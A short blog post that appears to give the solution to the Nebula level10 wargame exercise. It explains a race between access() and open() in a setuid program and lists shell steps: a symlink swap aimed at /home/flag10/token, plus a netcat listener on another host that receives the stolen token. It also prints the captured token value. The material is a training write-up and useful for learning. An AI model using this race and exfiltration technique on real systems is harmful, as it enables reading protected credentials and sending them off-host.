PH

« Home

Nebula level10 solution

February 1, 2012 06:52:25 by Pi3cH

the access() check is done using the calling process's real UID and GID, rather than the effective IDs as is done when actually opening the file - open(). The idea here is to create a symbolic link to a readable file, once the program pass the following line, change the symbolic link to the /home/flag10/token file so the open() and read() operations fetch the content of the file.

if(access(argv[1], ROK) == 0) {

To do so, you need another host to listen to incomming connections on port 18211.

  1.  
    1. Create a symbolic link to a random readable file (e.g. ln -s ~/readable ~/pi3ch)
    2. Execute flag10 in the background i.e. ./flag10 ~/pi3ch OTHERHOSTIPADDRESS &
    3. rm ~/pi3ch; ln -s /home/flag10/token ~/pi3ch
    4. On the other host listen to the connection on port 18211 e.g. nc -vvvv -n -l -p 18211 
    5. Wait and once you get 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 you are done with this level (content of token file).

An alternative solution for this problem is posted on http://www.mattandreko.com/2011/12/exploit-exercises-nebula-10.html

Creative Commons License Pedram Hayati